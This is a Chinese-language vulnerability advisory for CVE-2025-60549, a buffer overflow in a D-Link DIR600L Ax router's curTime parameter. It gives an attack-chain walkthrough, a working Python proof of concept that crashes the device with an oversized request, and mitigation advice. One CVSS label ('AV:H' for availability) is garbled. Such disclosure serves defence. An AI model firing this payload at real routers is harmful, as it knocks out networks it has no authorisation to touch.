CVE-2025-60549 D-Link DIR600L Ax 缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2025-60549

漏洞类型

缓冲区溢出

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

D-Link DIR600L Ax (FW116WWb01)

漏洞概述

CVE-2025-60549是D-Link DIR600L Ax路由器固件版本FW116WWb01中存在的缓冲区溢出安全漏洞。该漏洞位于formAutoDetecWAN_wizard4函数中，攻击者可通过curTime参数注入超长字符串，触发缓冲区溢出条件。此漏洞无需认证即可利用，攻击复杂度低，可通过远程网络发起攻击。成功利用此漏洞可能导致设备拒绝服务（DoS），使路由器服务中断，影响网络正常运行。由于该漏洞影响可用性较高（AV:H），攻击者可能通过构造恶意请求导致设备崩溃或执行任意代码。建议受影响用户尽快采取防护措施，避免遭受攻击。

技术细节

该漏洞为典型的栈缓冲区溢出（Stack Buffer Overflow）漏洞。在D-Link DIR600L Ax路由器的formAutoDetecWAN_wizard4函数中，程序未对用户输入的curTime参数进行长度校验，直接将用户可控的数据复制到固定大小的栈缓冲区中。当攻击者向curTime参数发送超长字符串（超过缓冲区预设容量）时，过量的数据会覆盖相邻的栈内存区域，包括返回地址、函数指针等关键数据结构。攻击者可利用此漏洞覆盖返回地址，将程序执行流劫持到恶意代码地址，从而执行任意命令或代码。由于该漏洞位于Web管理接口的处理函数中，且无需认证即可触发，攻击者可通过HTTP请求远程利用此漏洞。CVSS 3.1评分7.5分，属于高危漏洞，主要威胁为可用性影响。

攻击链分析

STEP 1

步骤1

信息收集：识别目标为D-Link DIR600L Ax路由器，确认固件版本为FW116WWb01

STEP 2

步骤2

定位漏洞点：访问/formAutoDetecWAN_wizard4接口，发现curTime参数存在缓冲区溢出风险

STEP 3

步骤3

构造恶意请求：构造包含超长字符串的HTTP GET请求，payload长度超过缓冲区容量

STEP 4

步骤4

发送攻击载荷：通过网络发送恶意请求到目标路由器Web管理接口，无需认证

STEP 5

步骤5

触发溢出：超长字符串覆盖栈内存，破坏返回地址，导致程序执行流被劫持

STEP 6

步骤6

达成攻击效果：设备崩溃造成拒绝服务（DoS），或成功执行任意代码

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-60549 PoC - D-Link DIR600L Ax Buffer Overflow
# Target: formAutoDetecWAN_wizard4 via curTime parameter

def exploit_buffer_overflow(target_ip, port=80):
    """
    Exploit for CVE-2025-60549
    Buffer Overflow in curTime parameter of formAutoDetecWAN_wizard4
    
    Args:
        target_ip: Target router IP address
        port: HTTP port (default: 80)
    """
    target_url = f"http://{target_ip}:{port}/formAutoDetecWAN_wizard4"
    
    # Buffer overflow payload - 1000 bytes to trigger overflow
    # In real exploit, this would be crafted with return address and shellcode
    overflow_payload = "A" * 1000
    
    params = {
        "curTime": overflow_payload
    }
    
    print(f"[*] Sending exploit payload to {target_url}")
    print(f"[*] Payload length: {len(overflow_payload)} bytes")
    
    try:
        response = requests.get(target_url, params=params, timeout=10)
        print(f"[+] Request sent. Status code: {response.status_code}")
        
        # Check if device is still responsive (DoS successful)
        check_url = f"http://{target_ip}:{port}/"
        try:
            check_response = requests.get(check_url, timeout=5)
            print("[-] Target still responsive")
        except requests.exceptions.RequestException:
            print("[+] Exploit successful - Target device appears crashed")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False
    
    return True

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)
    
    target_ip = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    
    exploit_buffer_overflow(target_ip, port)

影响范围

D-Link DIR600L Ax FW116WWb01

防御指南

临时缓解措施

临时缓解措施：在网络层面限制对路由器Web管理接口的访问，仅允许受信任的IP地址访问管理后台；如条件允许，可临时禁用WAN侧的Web管理功能，仅允许局域网内访问；监控设备运行状态，发现异常时及时重启恢复服务。该漏洞无官方补丁前，建议通过防火墙规则限制对路由器80/443端口的访问，并密切关官方安全公告。